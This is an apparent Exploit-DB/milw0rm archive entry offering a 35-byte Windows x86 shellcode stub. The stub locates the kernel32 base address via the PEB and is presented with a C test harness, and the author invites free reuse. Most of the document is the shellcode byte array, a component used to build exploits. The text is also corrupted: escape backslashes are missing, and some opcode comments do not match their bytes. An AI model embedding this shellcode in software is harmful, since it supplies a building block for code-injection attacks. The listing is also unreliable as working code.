https://www.exploit-db.com/exploits/13527

漏洞细节尚未披露

/*This is a 35 byte C implementation of the use of the PEB method to get
*the kernel32 base address on Windows. This is generic code designed to
*run on both Windows 9x and NT based systems. The code has been optimized
*to not have any 00h bytes so that you wont have to use an XOR routine to
*encode the shellcode. I used relative jumps and xor tricks to avoid the
*00h bytes and make the code as small as I could get it. Feel free to use
*this source in anything that you want.
*/


/* 35 byte PEB method for Windows 9x/NT/2k/XP
*  0x00 byte optimized, no XOR routine required.
*
*  www.4x10m.com
*  oc.192
*  irc.4x10m.net #4x10m
*/

unsigned char shellcode[] =
/*  35 byte PEB - 00h removal and size optimized  */
/*      22 - 24 total clock cycles on a x486      */
"x31xC0"                  /* xor eax, eax       */
"x31xD2"                  /* xor edx, edx       */
"xB2x30"                  /* mov dl, 30h        */
"x64x8Bx02"              /* mov eax, [fs:edx]  */      /* PEB base address */
"x85xC0"                  /* test eax, eax      */
"x78xC0"                  /* js 0Ch             */
"x8Bx40x0C"              /* mov eax, [eax+0Ch] */      /* NT kernel32 routine */
"x8Bx70x1C"              /* mov esi, [eax+1Ch] */
"xAD"                      /* lodsd              */
"x8Bx40x08"              /* mov eax, [eax+08h] */
"xEBx07"                  /* jmp short 09h      */
"x8Bx40x34"              /* mov eax, [eax+34h] */      /* 9x kernel32 routine */
"x8Dx40x7C"              /* lea eax, [eax+7Ch] */
"x8Dx40x3C"              /* mov eax, [eax+3Ch] */
;

int main(int argc, char *argv[]) {
      //void (*sc)() = (void *)shellcode;
      printf("len:%dn", sizeof(shellcode));
      //sc();
      return 0;
}

// milw0rm.com [2005-01-09]